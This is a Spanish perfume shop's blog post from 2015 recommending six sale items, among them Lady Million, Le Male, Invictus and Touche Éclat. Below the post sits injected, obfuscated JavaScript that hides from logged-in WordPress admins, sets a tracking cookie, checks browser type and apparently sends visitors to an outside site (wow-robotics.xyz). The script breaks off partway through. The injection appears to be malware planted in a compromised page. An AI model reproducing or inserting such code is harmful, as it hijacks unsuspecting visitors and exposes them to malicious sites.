Perfumes Online

En Perfumerías Tin Tin ya han comenzado las Rebajas y queremos que saquéis el máximo partido a nuestras ofertas. Sabemos que tras las Navidades y Reyes nuestros bolsillos se merecen un trato especial y en Perfumes Tin Tin hemos preparado una selección de los 6 productos al mejor precio imprescindibles en estas rebajas:

Un perfume que ha sido un éxito las pasadas navidades y que continua siéndolo en este 2015 es Lady Million de Paco Rabanne del cual también os hablábamos hace unas semanas aquí. Además os lo recomendamos en su versión cofre que incluye además del perfume en 50 ml, una loción corporal de 100 ml y una miniatura de 5 ml ideal para llevar en el bolso y reponernos el perfume a lo largo del día.

Un clásico entre los perfumes de hombre es el perfume Le Male de Jean Paul Gaultier, uno de los perfumes considerados como más seductores. Podrás encontrar cualquiera de sus formatos en nuestras rebajas a un precio espectacular.

Si lo que buscas es un nuevo perfume para él, Invictus de Paco Rabanne no te decepcionará, además el formato cofre que te recomendamos incluye además del perfume en 100 ml, el desodorante de 150 ml lo que hará que combinado sea el combo perfecto. En este post te damos más detalles sobre esta fragancia.

Aprovecha esta magnífica oportunidad y hazte con una crema antiarrugas con efecto lifting, Rénergie French Lift de Lâncome reúne toda la innovación aplicada al cuidado de la piel. Con su fórmula inspirada en las precisas y refinadas técnicas del lifting francés, reconocidas por su resultado natural conseguiremos una piel re-energizada y radiante.

Y para aquellos hombres que quieran cuidar su piel resentida por este frío invierno que mejor que esté set de crema hidratante Aquapower de Biotherm, contiene agua termal que hará las delicias de nuestra piel. Además incluye un refrescante gel de ducha de 150 ML que hará de la ducha un momento especial.

Para terminar, la guinda del pastel en nuestras rebajas es uno de los productos fetiche de la casa Yves Saint Laurent: Touche Éclat. Os recomendamos su versión cofre en la que podréis probar su fantástica máscara de pestañas una combinación de productos que nos ayudarán a conseguir una mirada espectacular.

¿Qué os parece nuestra selección de productos? ¿Cuál de estos productos os gustaría probar?

var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone